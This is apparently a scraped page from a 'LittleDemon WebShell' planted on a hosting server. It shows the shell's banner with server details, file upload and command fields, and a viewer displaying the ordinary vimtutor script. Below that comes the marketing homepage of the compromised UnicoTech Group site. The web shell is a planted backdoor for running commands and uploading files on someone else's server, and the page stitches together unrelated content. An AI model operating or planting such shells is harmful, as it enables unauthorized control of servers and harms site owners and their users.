LittleDemon WebShell


Linux nl-srv-web1706.main-hosting.eu 5.14.0-611.13.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 11 04:57:59 EST 2025 x86_64
Path : /bin/
File Upload :
Command :
Current File : //bin/vimtutor

#!/usr/bin/sh

# Start Vim on a copy of the tutor file.

# Usage: vimtutor [-g] [xx]
# Where optional argument -g starts vimtutor in gvim (GUI) instead of vim.
# and xx is a language code like "es" or "nl".
# When an argument is given, it tries loading that tutor.
# When this fails or no argument was given, it tries using 'v:lang'
# When that also fails, it uses the English version.

# Vim could be called "vim" or "vi".  Also check for "vimN", for people who
# have Vim installed with its version number.
# We anticipate up to a future Vim 8.1 version :-).
seq="vim vim81 vim80 vim8 vim74 vim73 vim72 vim71 vim70 vim7 vim6 vi"
if test "$1" = "-g"; then 
  # Try to use the GUI version of Vim if possible, it will fall back
  # on Vim if Gvim is not installed.
  seq="gvim gvim81 gvim80 gvim8 gvim74 gvim73 gvim72 gvim71 gvim70 gvim7 gvim6 $seq"
  shift
fi

xx=$1
export xx

# We need a temp file for the copy.  First try using a standard command.
tmp="${TMPDIR-/tmp}"
TUTORCOPY=`mktemp $tmp/tutorXXXXXX || tempfile -p tutor || echo none`

# If the standard commands failed then create a directory to put the copy in.
# That is a secure way to make a temp file.
if test "$TUTORCOPY" = none; then
	tmpdir=$tmp/vimtutor$$
	OLD_UMASK=`umask`
	umask 077
	getout=no
	mkdir $tmpdir || getout=yes
	umask $OLD_UMASK
	if test $getout = yes; then
		echo "Could not create directory for tutor copy, exiting."
		exit 1
	fi
	TUTORCOPY=$tmpdir/tutorcopy
	touch $TUTORCOPY
	TODELETE=$tmpdir
else
	TODELETE=$TUTORCOPY
fi

export TUTORCOPY

# remove the copy of the tutor on exit
trap "rm -rf $TODELETE" 0 1 2 3 9 11 13 15

for i in $seq; do
	testvim=`which $i 2>/dev/null`
	if test -f "$testvim"; then
		VIM=$i
		break
	fi
done

# When no Vim version was found fall back to "vim", you'll get an error message
# below.
if test -z "$VIM"; then
	VIM=vim
fi

# Use Vim to copy the tutor, it knows the value of $VIMRUNTIME
# The script tutor.vim tells Vim which file to copy
$VIM -f -u NONE -c 'so $VIMRUNTIME/tutor/tutor.vim'

# Start vim without any .vimrc, set 'nocompatible' and 'showcmd'
$VIM -f -u NONE -c "set nocp showcmd" $TUTORCOPY

LittleDemon - FACEBOOK
[ KELUAR ]
Home Page - UnicoTech Group – Innovative Technology & Business Solutions in Qatar مجموعة يونيكوتك – حلول مبتكرة للأعمال والتقنية في قطر
Empowering Your Business Through Innovation

Smart Technology. Strategic Solutions. Real Growth.

Smart Technology. Strategic Solutions. Real Growth.

UnicoTech Group’s Premier Services for Your Success

Image Icon
Company and Business Entity Establishment

We provide end-to-end solutions for establishing companies and business entities, including gover...

Learn More
Image Icon
Innovative Technological Solutions

Our technological solutions are tailored to meet the unique needs of your business. We implement...

Learn More
Image Icon
Online Business and Application Creation and Management

We offer end-to-end services for e-commerce and digital applications, including market research,...

Learn More
Image Icon
Commercial Company Management and Development

We provide operational oversight, process optimization, financial management support, and strateg...

Learn More
Image Icon
PRM Programs and Proprietary Products

 At Ecore Te...

Learn More
Image Icon
Strategic Business Consultations

Our consulting services provide actionable strategies for growth. We assess challenges, identify...

Learn More
Image Icon
Brand Identity Development

We help businesses establish a cohesive brand identity, from logos and visual assets to messaging...

Learn More
Image Icon
Innovative Marketing Plans

We develop comprehensive marketing strategies, including digital campaigns, social media manageme...

Learn More
Image Icon
Advanced Technical Solutions

We provide IT infrastructure, cloud solutions, cybersecurity measures, and automation systems. Ou...

Learn More
Image Icon
Commercial Office Provision

We help clients secure commercial office spaces, from location selection and lease negotiation to...

Learn More
Image

Our Key Services Driving Success

At UnicoTech Group, we focus on delivering high-impact solutions that empower your business to achieve measurable results and sustainable growth. Here are the top services that define our success:

Advanced Technology Integration
Strategic Business Consulting
Digital Project Management

Showcasing Our Achievements and Strategic Partnerships

image_1
image_2
image_3
image_4
image_5
image_6
image_7

Explore our recent projects

Big image
Big2 image

Innovative Solutions for Your Business Growth

Advanced Technology Integration

Seamlessly integrate cutting-edge technology into your operations to enhance efficiency and drive innovation.

Image
Strategic Business Consulting

Receive expert guidance to optimize business strategies and achieve sustainable growth.

Comprehensive Project Management

End-to-end management of your digital and business projects, ensuring timely delivery and measurable results.

Explore flexible pricing for you

Startup

$99/month

Best for Startup business owners who needs website for business.

Select This Plan
  • 10 GB disk space availability
  • 50 GB NVMe SSD for use
  • Free platform access for all
  • Free lifetime updates facility
  • Free one year support
  • 24/7 Support

Business

$299/month

Best for Startup business owners who needs website for business.

Select This Plan
  • 10 GB disk space availability
  • 50 GB NVMe SSD for use
  • Free platform access for all
  • Free lifetime updates facility
  • Free one year support
  • 24/7 Support

Enterprise

$779/month

Best for Startup business owners who needs website for business.

Select This Plan
  • 100 GB disk space availability
  • 1150 GB NVMe SSD for use
  • Free platform access for all
  • Free lifetime updates facility
  • Free one year support
  • 24/7 Support

Stay updated with our most recent articles, expert analyses, and industry insights in technology and business solutions.

Frequently Asked Questions (FAQ)

Discover answers to the most common inquiries about UnicoTech Group’s services and solutions. If you don’t see the information you need, our team is always ready to assist you.

Q1. Where is UnicoTech Group located?

We operate in Qatar and provide services tailored to local regulations and business environments.

 

Q2. Can you handle existing projects or applications?

  • Absolutely. We can manage, develop, and optimize your existing digital projects and applications according to your business needs.

Q3. Do you provide support after project delivery?

  • Yes, we offer ongoing support, training, and maintenance services to ensure long-term success and smooth operation.

Q4. How can I start a project with UnicoTech Group?

  • You can contact our team via the website or email. We provide consultation, project planning, and step-by-step support to turn your idea into a reality.